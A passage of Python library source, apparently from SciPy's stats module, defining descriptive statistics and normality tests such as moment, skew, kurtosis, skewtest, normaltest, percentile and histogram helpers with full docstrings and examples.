axis : int or None, optional
Axis along which the central moment is computed. Default is 0.
If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
n-th central moment : ndarray or float
The appropriate moment along the given axis or over all values if axis
is None. The denominator for the moment calculation is the number of
observations, no degrees of freedom correction is done.
See Also
--------
kurtosis, skew, describe
Notes
-----
The k-th central moment of a data sample is:
.. math::
m_k = \frac{1}{n} \sum_{i = 1}^n (x_i - \bar{x})^k
Where n is the number of samples and x-bar is the mean. This function uses
exponentiation by squares [1]_ for efficiency.
References
----------
.. [1] https://eli.thegreenplace.net/2009/03/21/efficient-integer-exponentiation-algorithms
Examples
--------
>>> from scipy.stats import moment
>>> moment([1, 2, 3, 4, 5], moment=1)
0.0
>>> moment([1, 2, 3, 4, 5], moment=2)
2.0
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.moment(a, moment, axis)
if a.size == 0:
# empty array, return nan(s) with shape matching `moment`
if np.isscalar(moment):
return np.nan
else:
return np.full(np.asarray(moment).shape, np.nan, dtype=np.float64)
# for array_like moment input, return a value for each.
if not np.isscalar(moment):
mmnt = [_moment(a, i, axis) for i in moment]
return np.array(mmnt)
else:
return _moment(a, moment, axis)
def _moment(a, moment, axis):
if np.abs(moment - np.round(moment)) > 0:
raise ValueError("All moment parameters must be integers")
if moment == 0:
# When moment equals 0, the result is 1, by definition.
shape = list(a.shape)
del shape[axis]
if shape:
# return an actual array of the appropriate shape
return np.ones(shape, dtype=float)
else:
# the input was 1D, so return a scalar instead of a rank-0 array
return 1.0
elif moment == 1:
# By definition the first moment about the mean is 0.
shape = list(a.shape)
del shape[axis]
if shape:
# return an actual array of the appropriate shape
return np.zeros(shape, dtype=float)
else:
# the input was 1D, so return a scalar instead of a rank-0 array
return np.float64(0.0)
else:
# Exponentiation by squares: form exponent sequence
n_list = [moment]
current_n = moment
while current_n > 2:
if current_n % 2:
current_n = (current_n - 1) / 2
else:
current_n /= 2
n_list.append(current_n)
# Starting point for exponentiation by squares
a_zero_mean = a - np.expand_dims(np.mean(a, axis), axis)
if n_list[-1] == 1:
s = a_zero_mean.copy()
else:
s = a_zero_mean**2
# Perform multiplications
for n in n_list[-2::-1]:
s = s**2
if n % 2:
s *= a_zero_mean
return np.mean(s, axis)
def variation(a, axis=0, nan_policy='propagate'):
"""
Compute the coefficient of variation.
The coefficient of variation is the ratio of the biased standard
deviation to the mean.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate the coefficient of variation. Default
is 0. If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
variation : ndarray
The calculated variation along the requested axis.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Examples
--------
>>> from scipy.stats import variation
>>> variation([1, 2, 3, 4, 5])
0.47140452079103173
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.variation(a, axis)
return a.std(axis) / a.mean(axis)
def skew(a, axis=0, bias=True, nan_policy='propagate'):
r"""
Compute the sample skewness of a data set.
For normally distributed data, the skewness should be about zero. For
unimodal continuous distributions, a skewness value greater than zero means
that there is more weight in the right tail of the distribution. The
function `skewtest` can be used to determine if the skewness value
is close enough to zero, statistically speaking.
Parameters
----------
a : ndarray
Input array.
axis : int or None, optional
Axis along which skewness is calculated. Default is 0.
If None, compute over the whole array `a`.
bias : bool, optional
If False, then the calculations are corrected for statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
skewness : ndarray
The skewness of values along an axis, returning 0 where all values are
equal.
Notes
-----
The sample skewness is computed as the Fisher-Pearson coefficient
of skewness, i.e.
.. math::
g_1=\frac{m_3}{m_2^{3/2}}
where
.. math::
m_i=\frac{1}{N}\sum_{n=1}^N(x[n]-\bar{x})^i
is the biased sample :math:`i\texttt{th}` central moment, and :math:`\bar{x}` is
the sample mean. If ``bias`` is False, the calculations are
corrected for bias and the value computed is the adjusted
Fisher-Pearson standardized moment coefficient, i.e.
.. math::
G_1=\frac{k_3}{k_2^{3/2}}=
\frac{\sqrt{N(N-1)}}{N-2}\frac{m_3}{m_2^{3/2}}.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Section 2.2.24.1
Examples
--------
>>> from scipy.stats import skew
>>> skew([1, 2, 3, 4, 5])
0.0
>>> skew([2, 8, 0, 4, 1, 9, 9, 0])
0.2650554122698573
"""
a, axis = _chk_asarray(a, axis)
n = a.shape[axis]
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.skew(a, axis, bias)
m2 = moment(a, 2, axis)
m3 = moment(a, 3, axis)
zero = (m2 == 0)
vals = _lazywhere(~zero, (m2, m3),
lambda m2, m3: m3 / m2**1.5,
0.)
if not bias:
can_correct = (n > 2) & (m2 > 0)
if can_correct.any():
m2 = np.extract(can_correct, m2)
m3 = np.extract(can_correct, m3)
nval = np.sqrt((n - 1.0) * n) / (n - 2.0) * m3 / m2**1.5
np.place(vals, can_correct, nval)
if vals.ndim == 0:
return vals.item()
return vals
def kurtosis(a, axis=0, fisher=True, bias=True, nan_policy='propagate'):
"""
Compute the kurtosis (Fisher or Pearson) of a dataset.
Kurtosis is the fourth central moment divided by the square of the
variance. If Fisher's definition is used, then 3.0 is subtracted from
the result to give 0.0 for a normal distribution.
If bias is False then the kurtosis is calculated using k statistics to
eliminate bias coming from biased moment estimators
Use `kurtosistest` to see if result is close enough to normal.
Parameters
----------
a : array
Data for which the kurtosis is calculated.
axis : int or None, optional
Axis along which the kurtosis is calculated. Default is 0.
If None, compute over the whole array `a`.
fisher : bool, optional
If True, Fisher's definition is used (normal ==> 0.0). If False,
Pearson's definition is used (normal ==> 3.0).
bias : bool, optional
If False, then the calculations are corrected for statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
kurtosis : array
The kurtosis of values along an axis. If all values are equal,
return -3 for Fisher's definition and 0 for Pearson's definition.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Examples
--------
In Fisher's definiton, the kurtosis of the normal distribution is zero.
In the following example, the kurtosis is close to zero, because it was
calculated from the dataset, not from the continuous distribution.
>>> from scipy.stats import norm, kurtosis
>>> data = norm.rvs(size=1000, random_state=3)
>>> kurtosis(data)
-0.06928694200380558
The distribution with a higher kurtosis has a heavier tail.
The zero valued kurtosis of the normal distribution in Fisher's definition
can serve as a reference point.
>>> import matplotlib.pyplot as plt
>>> import scipy.stats as stats
>>> from scipy.stats import kurtosis
>>> x = np.linspace(-5, 5, 100)
>>> ax = plt.subplot()
>>> distnames = ['laplace', 'norm', 'uniform']
>>> for distname in distnames:
... if distname == 'uniform':
... dist = getattr(stats, distname)(loc=-2, scale=4)
... else:
... dist = getattr(stats, distname)
... data = dist.rvs(size=1000)
... kur = kurtosis(data, fisher=True)
... y = dist.pdf(x)
... ax.plot(x, y, label="{}, {}".format(distname, round(kur, 3)))
... ax.legend()
The Laplace distribution has a heavier tail than the normal distribution.
The uniform distribution (which has negative kurtosis) has the thinnest
tail.
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.kurtosis(a, axis, fisher, bias)
n = a.shape[axis]
m2 = moment(a, 2, axis)
m4 = moment(a, 4, axis)
zero = (m2 == 0)
olderr = np.seterr(all='ignore')
try:
vals = np.where(zero, 0, m4 / m2**2.0)
finally:
np.seterr(**olderr)
if not bias:
can_correct = (n > 3) & (m2 > 0)
if can_correct.any():
m2 = np.extract(can_correct, m2)
m4 = np.extract(can_correct, m4)
nval = 1.0/(n-2)/(n-3) * ((n**2-1.0)*m4/m2**2.0 - 3*(n-1)**2.0)
np.place(vals, can_correct, nval + 3.0)
if vals.ndim == 0:
vals = vals.item() # array scalar
return vals - 3 if fisher else vals
DescribeResult = namedtuple('DescribeResult',
('nobs', 'minmax', 'mean', 'variance', 'skewness',
'kurtosis'))
def describe(a, axis=0, ddof=1, bias=True, nan_policy='propagate'):
"""
Compute several descriptive statistics of the passed array.
Parameters
----------
a : array_like
Input data.
axis : int or None, optional
Axis along which statistics are calculated. Default is 0.
If None, compute over the whole array `a`.
ddof : int, optional
Delta degrees of freedom (only for variance). Default is 1.
bias : bool, optional
If False, then the skewness and kurtosis calculations are corrected for
statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
nobs : int or ndarray of ints
Number of observations (length of data along `axis`).
When 'omit' is chosen as nan_policy, each column is counted separately.
minmax: tuple of ndarrays or floats
Minimum and maximum value of data array.
mean : ndarray or float
Arithmetic mean of data along axis.
variance : ndarray or float
Unbiased variance of the data along axis, denominator is number of
observations minus one.
skewness : ndarray or float
Skewness, based on moment calculations with denominator equal to
the number of observations, i.e. no degrees of freedom correction.
kurtosis : ndarray or float
Kurtosis (Fisher). The kurtosis is normalized so that it is
zero for the normal distribution. No degrees of freedom are used.
See Also
--------
skew, kurtosis
Examples
--------
>>> from scipy import stats
>>> a = np.arange(10)
>>> stats.describe(a)
DescribeResult(nobs=10, minmax=(0, 9), mean=4.5, variance=9.166666666666666,
skewness=0.0, kurtosis=-1.2242424242424244)
>>> b = [[1, 2], [3, 4]]
>>> stats.describe(b)
DescribeResult(nobs=2, minmax=(array([1, 2]), array([3, 4])),
mean=array([2., 3.]), variance=array([2., 2.]),
skewness=array([0., 0.]), kurtosis=array([-2., -2.]))
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.describe(a, axis, ddof, bias)
if a.size == 0:
raise ValueError("The input must not be empty.")
n = a.shape[axis]
mm = (np.min(a, axis=axis), np.max(a, axis=axis))
m = np.mean(a, axis=axis)
v = np.var(a, axis=axis, ddof=ddof)
sk = skew(a, axis, bias=bias)
kurt = kurtosis(a, axis, bias=bias)
return DescribeResult(n, mm, m, v, sk, kurt)
#####################################
# NORMALITY TESTS #
#####################################
SkewtestResult = namedtuple('SkewtestResult', ('statistic', 'pvalue'))
def skewtest(a, axis=0, nan_policy='propagate'):
"""
Test whether the skew is different from the normal distribution.
This function tests the null hypothesis that the skewness of
the population that the sample was drawn from is the same
as that of a corresponding normal distribution.
Parameters
----------
a : array
The data to be tested.
axis : int or None, optional
Axis along which statistics are calculated. Default is 0.
If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The computed z-score for this test.
pvalue : float
Two-sided p-value for the hypothesis test.
Notes
-----
The sample size must be at least 8.
References
----------
.. [1] R. B. D'Agostino, A. J. Belanger and R. B. D'Agostino Jr.,
"A suggestion for using powerful and informative tests of
normality", American Statistician 44, pp. 316-321, 1990.
Examples
--------
>>> from scipy.stats import skewtest
>>> skewtest([1, 2, 3, 4, 5, 6, 7, 8])
SkewtestResult(statistic=1.0108048609177787, pvalue=0.3121098361421897)
>>> skewtest([2, 8, 0, 4, 1, 9, 9, 0])
SkewtestResult(statistic=0.44626385374196975, pvalue=0.6554066631275459)
>>> skewtest([1, 2, 3, 4, 5, 6, 7, 8000])
SkewtestResult(statistic=3.571773510360407, pvalue=0.0003545719905823133)
>>> skewtest([100, 100, 100, 100, 100, 100, 100, 101])
SkewtestResult(statistic=3.5717766638478072, pvalue=0.000354567720281634)
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.skewtest(a, axis)
if axis is None:
a = np.ravel(a)
axis = 0
b2 = skew(a, axis)
n = a.shape[axis]
if n < 8:
raise ValueError(
"skewtest is not valid with less than 8 samples; %i samples"
" were given." % int(n))
y = b2 * math.sqrt(((n + 1) * (n + 3)) / (6.0 * (n - 2)))
beta2 = (3.0 * (n**2 + 27*n - 70) * (n+1) * (n+3) /
((n-2.0) * (n+5) * (n+7) * (n+9)))
W2 = -1 + math.sqrt(2 * (beta2 - 1))
delta = 1 / math.sqrt(0.5 * math.log(W2))
alpha = math.sqrt(2.0 / (W2 - 1))
y = np.where(y == 0, 1, y)
Z = delta * np.log(y / alpha + np.sqrt((y / alpha)**2 + 1))
return SkewtestResult(Z, 2 * distributions.norm.sf(np.abs(Z)))
KurtosistestResult = namedtuple('KurtosistestResult', ('statistic', 'pvalue'))
def kurtosistest(a, axis=0, nan_policy='propagate'):
"""
Test whether a dataset has normal kurtosis.
This function tests the null hypothesis that the kurtosis
of the population from which the sample was drawn is that
of the normal distribution: ``kurtosis = 3(n-1)/(n+1)``.
Parameters
----------
a : array
Array of the sample data.
axis : int or None, optional
Axis along which to compute test. Default is 0. If None,
compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The computed z-score for this test.
pvalue : float
The two-sided p-value for the hypothesis test.
Notes
-----
Valid only for n>20. This function uses the method described in [1]_.
References
----------
.. [1] see e.g. F. J. Anscombe, W. J. Glynn, "Distribution of the kurtosis
statistic b2 for normal samples", Biometrika, vol. 70, pp. 227-234, 1983.
Examples
--------
>>> from scipy.stats import kurtosistest
>>> kurtosistest(list(range(20)))
KurtosistestResult(statistic=-1.7058104152122062, pvalue=0.08804338332528348)
>>> np.random.seed(28041990)
>>> s = np.random.normal(0, 1, 1000)
>>> kurtosistest(s)
KurtosistestResult(statistic=1.2317590987707365, pvalue=0.21803908613450895)
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.kurtosistest(a, axis)
n = a.shape[axis]
if n < 5:
raise ValueError(
"kurtosistest requires at least 5 observations; %i observations"
" were given." % int(n))
if n < 20:
warnings.warn("kurtosistest only valid for n>=20 ... continuing "
"anyway, n=%i" % int(n))
b2 = kurtosis(a, axis, fisher=False)
E = 3.0*(n-1) / (n+1)
varb2 = 24.0*n*(n-2)*(n-3) / ((n+1)*(n+1.)*(n+3)*(n+5)) # [1]_ Eq. 1
x = (b2-E) / np.sqrt(varb2) # [1]_ Eq. 4
# [1]_ Eq. 2:
sqrtbeta1 = 6.0*(n*n-5*n+2)/((n+7)*(n+9)) * np.sqrt((6.0*(n+3)*(n+5)) /
(n*(n-2)*(n-3)))
# [1]_ Eq. 3:
A = 6.0 + 8.0/sqrtbeta1 * (2.0/sqrtbeta1 + np.sqrt(1+4.0/(sqrtbeta1**2)))
term1 = 1 - 2/(9.0*A)
denom = 1 + x*np.sqrt(2/(A-4.0))
term2 = np.sign(denom) * np.where(denom == 0.0, np.nan,
np.power((1-2.0/A)/np.abs(denom), 1/3.0))
if np.any(denom == 0):
msg = "Test statistic not defined in some cases due to division by " \
"zero. Return nan in that case..."
warnings.warn(msg, RuntimeWarning)
Z = (term1 - term2) / np.sqrt(2/(9.0*A)) # [1]_ Eq. 5
if Z.ndim == 0:
Z = Z[()]
# zprob uses upper tail, so Z needs to be positive
return KurtosistestResult(Z, 2 * distributions.norm.sf(np.abs(Z)))
NormaltestResult = namedtuple('NormaltestResult', ('statistic', 'pvalue'))
def normaltest(a, axis=0, nan_policy='propagate'):
"""
Test whether a sample differs from a normal distribution.
This function tests the null hypothesis that a sample comes
from a normal distribution. It is based on D'Agostino and
Pearson's [1]_, [2]_ test that combines skew and kurtosis to
produce an omnibus test of normality.
Parameters
----------
a : array_like
The array containing the sample to be tested.
axis : int or None, optional
Axis along which to compute test. Default is 0. If None,
compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float or array
``s^2 + k^2``, where ``s`` is the z-score returned by `skewtest` and
``k`` is the z-score returned by `kurtosistest`.
pvalue : float or array
A 2-sided chi squared probability for the hypothesis test.
References
----------
.. [1] D'Agostino, R. B. (1971), "An omnibus test of normality for
moderate and large sample size", Biometrika, 58, 341-348
.. [2] D'Agostino, R. and Pearson, E. S. (1973), "Tests for departure from
normality", Biometrika, 60, 613-622
Examples
--------
>>> from scipy import stats
>>> pts = 1000
>>> np.random.seed(28041990)
>>> a = np.random.normal(0, 1, size=pts)
>>> b = np.random.normal(2, 1, size=pts)
>>> x = np.concatenate((a, b))
>>> k2, p = stats.normaltest(x)
>>> alpha = 1e-3
>>> print("p = {:g}".format(p))
p = 3.27207e-11
>>> if p < alpha: # null hypothesis: x comes from a normal distribution
... print("The null hypothesis can be rejected")
... else:
... print("The null hypothesis cannot be rejected")
The null hypothesis can be rejected
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.normaltest(a, axis)
s, _ = skewtest(a, axis)
k, _ = kurtosistest(a, axis)
k2 = s*s + k*k
return NormaltestResult(k2, distributions.chi2.sf(k2, 2))
def jarque_bera(x):
"""
Perform the Jarque-Bera goodness of fit test on sample data.
The Jarque-Bera test tests whether the sample data has the skewness and
kurtosis matching a normal distribution.
Note that this test only works for a large enough number of data samples
(>2000) as the test statistic asymptotically has a Chi-squared distribution
with 2 degrees of freedom.
Parameters
----------
x : array_like
Observations of a random variable.
Returns
-------
jb_value : float
The test statistic.
p : float
The p-value for the hypothesis test.
References
----------
.. [1] Jarque, C. and Bera, A. (1980) "Efficient tests for normality,
homoscedasticity and serial independence of regression residuals",
6 Econometric Letters 255-259.
Examples
--------
>>> from scipy import stats
>>> np.random.seed(987654321)
>>> x = np.random.normal(0, 1, 100000)
>>> y = np.random.rayleigh(1, 100000)
>>> stats.jarque_bera(x)
(4.7165707989581342, 0.09458225503041906)
>>> stats.jarque_bera(y)
(6713.7098548143422, 0.0)
"""
x = np.asarray(x)
n = x.size
if n == 0:
raise ValueError('At least one observation is required.')
mu = x.mean()
diffx = x - mu
skewness = (1 / n * np.sum(diffx**3)) / (1 / n * np.sum(diffx**2))**(3 / 2.)
kurtosis = (1 / n * np.sum(diffx**4)) / (1 / n * np.sum(diffx**2))**2
jb_value = n / 6 * (skewness**2 + (kurtosis - 3)**2 / 4)
p = 1 - distributions.chi2.cdf(jb_value, 2)
return jb_value, p
#####################################
# FREQUENCY FUNCTIONS #
#####################################
@np.deprecate(message="`itemfreq` is deprecated and will be removed in a "
"future version. Use instead `np.unique(..., return_counts=True)`")
def itemfreq(a):
"""
Return a 2-D array of item frequencies.
Parameters
----------
a : (N,) array_like
Input array.
Returns
-------
itemfreq : (K, 2) ndarray
A 2-D frequency table. Column 1 contains sorted, unique values from
`a`, column 2 contains their respective counts.
Examples
--------
>>> from scipy import stats
>>> a = np.array([1, 1, 5, 0, 1, 2, 2, 0, 1, 4])
>>> stats.itemfreq(a)
array([[ 0., 2.],
[ 1., 4.],
[ 2., 2.],
[ 4., 1.],
[ 5., 1.]])
>>> np.bincount(a)
array([2, 4, 2, 0, 1, 1])
>>> stats.itemfreq(a/10.)
array([[ 0. , 2. ],
[ 0.1, 4. ],
[ 0.2, 2. ],
[ 0.4, 1. ],
[ 0.5, 1. ]])
"""
items, inv = np.unique(a, return_inverse=True)
freq = np.bincount(inv)
return np.array([items, freq]).T
def scoreatpercentile(a, per, limit=(), interpolation_method='fraction',
axis=None):
"""
Calculate the score at a given percentile of the input sequence.
For example, the score at `per=50` is the median. If the desired quantile
lies between two data points, we interpolate between them, according to
the value of `interpolation`. If the parameter `limit` is provided, it
should be a tuple (lower, upper) of two values.
Parameters
----------
a : array_like
A 1-D array of values from which to extract score.
per : array_like
Percentile(s) at which to extract score. Values should be in range
[0,100].
limit : tuple, optional
Tuple of two scalars, the lower and upper limits within which to
compute the percentile. Values of `a` outside
this (closed) interval will be ignored.
interpolation_method : {'fraction', 'lower', 'higher'}, optional
Specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`
The following options are available (default is 'fraction'):
* 'fraction': ``i + (j - i) * fraction`` where ``fraction`` is the
fractional part of the index surrounded by ``i`` and ``j``
* 'lower': ``i``
* 'higher': ``j``
axis : int, optional
Axis along which the percentiles are computed. Default is None. If
None, compute over the whole array `a`.
Returns
-------
score : float or ndarray
Score at percentile(s).
See Also
--------
percentileofscore, numpy.percentile
Notes
-----
This function will become obsolete in the future.
For NumPy 1.9 and higher, `numpy.percentile` provides all the functionality
that `scoreatpercentile` provides. And it's significantly faster.
Therefore it's recommended to use `numpy.percentile` for users that have
numpy >= 1.9.
Examples
--------
>>> from scipy import stats
>>> a = np.arange(100)
>>> stats.scoreatpercentile(a, 50)
49.5
"""
# adapted from NumPy's percentile function. When we require numpy >= 1.8,
# the implementation of this function can be replaced by np.percentile.
a = np.asarray(a)
if a.size == 0:
# empty array, return nan(s) with shape matching `per`
if np.isscalar(per):
return np.nan
else:
return np.full(np.asarray(per).shape, np.nan, dtype=np.float64)
if limit:
a = a[(limit[0] <= a) & (a <= limit[1])]
sorted_ = np.sort(a, axis=axis)
if axis is None:
axis = 0
return _compute_qth_percentile(sorted_, per, interpolation_method, axis)
# handle sequence of per's without calling sort multiple times
def _compute_qth_percentile(sorted_, per, interpolation_method, axis):
if not np.isscalar(per):
score = [_compute_qth_percentile(sorted_, i,
interpolation_method, axis)
for i in per]
return np.array(score)
if not (0 <= per <= 100):
raise ValueError("percentile must be in the range [0, 100]")
indexer = [slice(None)] * sorted_.ndim
idx = per / 100. * (sorted_.shape[axis] - 1)
if int(idx) != idx:
# round fractional indices according to interpolation method
if interpolation_method == 'lower':
idx = int(np.floor(idx))
elif interpolation_method == 'higher':
idx = int(np.ceil(idx))
elif interpolation_method == 'fraction':
pass # keep idx as fraction and interpolate
else:
raise ValueError("interpolation_method can only be 'fraction', "
"'lower' or 'higher'")
i = int(idx)
if i == idx:
indexer[axis] = slice(i, i + 1)
weights = array(1)
sumval = 1.0
else:
indexer[axis] = slice(i, i + 2)
j = i + 1
weights = array([(j - idx), (idx - i)], float)
wshape = [1] * sorted_.ndim
wshape[axis] = 2
weights.shape = wshape
sumval = weights.sum()
# Use np.add.reduce (== np.sum but a little faster) to coerce data type
return np.add.reduce(sorted_[tuple(indexer)] * weights, axis=axis) / sumval
def percentileofscore(a, score, kind='rank'):
"""
Compute the percentile rank of a score relative to a list of scores.
A `percentileofscore` of, for example, 80% means that 80% of the
scores in `a` are below the given score. In the case of gaps or
ties, the exact definition depends on the optional keyword, `kind`.
Parameters
----------
a : array_like
Array of scores to which `score` is compared.
score : int or float
Score that is compared to the elements in `a`.
kind : {'rank', 'weak', 'strict', 'mean'}, optional
Specifies the interpretation of the resulting score.
The following options are available (default is 'rank'):
* 'rank': Average percentage ranking of score. In case of multiple
matches, average the percentage rankings of all matching scores.
* 'weak': This kind corresponds to the definition of a cumulative
distribution function. A percentileofscore of 80% means that 80%
of values are less than or equal to the provided score.
* 'strict': Similar to "weak", except that only values that are
strictly less than the given score are counted.
* 'mean': The average of the "weak" and "strict" scores, often used
in testing. See https://en.wikipedia.org/wiki/Percentile_rank
Returns
-------
pcos : float
Percentile-position of score (0-100) relative to `a`.
See Also
--------
numpy.percentile
Examples
--------
Three-quarters of the given values lie below a given score:
>>> from scipy import stats
>>> stats.percentileofscore([1, 2, 3, 4], 3)
75.0
With multiple matches, note how the scores of the two matches, 0.6
and 0.8 respectively, are averaged:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3)
70.0
Only 2/5 values are strictly less than 3:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='strict')
40.0
But 4/5 values are less than or equal to 3:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='weak')
80.0
The average between the weak and the strict scores is:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='mean')
60.0
"""
if np.isnan(score):
return np.nan
a = np.asarray(a)
n = len(a)
if n == 0:
return 100.0
if kind == 'rank':
left = np.count_nonzero(a < score)
right = np.count_nonzero(a <= score)
pct = (right + left + (1 if right > left else 0)) * 50.0/n
return pct
elif kind == 'strict':
return np.count_nonzero(a < score) / n * 100
elif kind == 'weak':
return np.count_nonzero(a <= score) / n * 100
elif kind == 'mean':
pct = (np.count_nonzero(a < score) + np.count_nonzero(a <= score)) / n * 50
return pct
else:
raise ValueError("kind can only be 'rank', 'strict', 'weak' or 'mean'")
HistogramResult = namedtuple('HistogramResult',
('count', 'lowerlimit', 'binsize', 'extrapoints'))
def _histogram(a, numbins=10, defaultlimits=None, weights=None, printextras=False):
"""
Create a histogram.
Separate the range into several bins and return the number of instances
in each bin.
Parameters
----------
a : array_like
Array of scores which will be put into bins.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultlimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in a is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0
printextras : bool, optional
If True, if there are extra points (i.e. the points that fall outside
the bin limits) a warning is raised saying how many of those points
there are. Default is False.
Returns
-------
count : ndarray
Number of points (or sum of weights) in each bin.
lowerlimit : float
Lowest value of histogram, the lower limit of the first bin.
binsize : float
The size of the bins (all bins have the same size).
extrapoints : int
The number of points outside the range of the histogram.
See Also
--------
numpy.histogram
Notes
-----
This histogram is based on numpy's histogram but has a larger range by
default if default limits is not set.
"""
a = np.ravel(a)
if defaultlimits is None:
if a.size == 0:
# handle empty arrays. Undetermined range, so use 0-1.
defaultlimits = (0, 1)
else:
# no range given, so use values in `a`
data_min = a.min()
data_max = a.max()
# Have bins extend past min and max values slightly
s = (data_max - data_min) / (2. * (numbins - 1.))
defaultlimits = (data_min - s, data_max + s)
# use numpy's histogram method to compute bins
hist, bin_edges = np.histogram(a, bins=numbins, range=defaultlimits,
weights=weights)
# hist are not always floats, convert to keep with old output
hist = np.array(hist, dtype=float)
# fixed width for bins is assumed, as numpy's histogram gives
# fixed width bins for int values for 'bins'
binsize = bin_edges[1] - bin_edges[0]
# calculate number of extra points
extrapoints = len([v for v in a
if defaultlimits[0] > v or v > defaultlimits[1]])
if extrapoints > 0 and printextras:
warnings.warn("Points outside given histogram range = %s"
% extrapoints)
return HistogramResult(hist, defaultlimits[0], binsize, extrapoints)
CumfreqResult = namedtuple('CumfreqResult',
('cumcount', 'lowerlimit', 'binsize',
'extrapoints'))
def cumfreq(a, numbins=10, defaultreallimits=None, weights=None):
"""
Return a cumulative frequency histogram, using the histogram function.
A cumulative histogram is a mapping that counts the cumulative number of
observations in all of the bins up to the specified bin.
Parameters
----------
a : array_like
Input array.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultreallimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in `a` is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0
Returns
-------
cumcount : ndarray
Binned values of cumulative frequency.
lowerlimit : float
Lower real limit
binsize : float
Width of each bin.
extrapoints : int
Extra points.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy import stats
>>> x = [1, 4, 2, 1, 3, 1]
>>> res = stats.cumfreq(x, numbins=4, defaultreallimits=(1.5, 5))
>>> res.cumcount
array([ 1., 2., 3., 3.])
>>> res.extrapoints
3
Create a normal distribution with 1000 random values
>>> rng = np.random.RandomState(seed=12345)
>>> samples = stats.norm.rvs(size=1000, random_state=rng)
Calculate cumulative frequencies
>>> res = stats.cumfreq(samples, numbins=25)
Calculate space of values for x
>>> x = res.lowerlimit + np.linspace(0, res.binsize*res.cumcount.size,
... res.cumcount.size)
Plot histogram and cumulative histogram
>>> fig = plt.figure(figsize=(10, 4))
>>> ax1 = fig.add_subplot(1, 2, 1)
>>> ax2 = fig.add_subplot(1, 2, 2)
>>> ax1.hist(samples, bins=25)
>>> ax1.set_title('Histogram')
>>> ax2.bar(x, res.cumcount, width=res.binsize)
>>> ax2.set_title('Cumulative histogram')
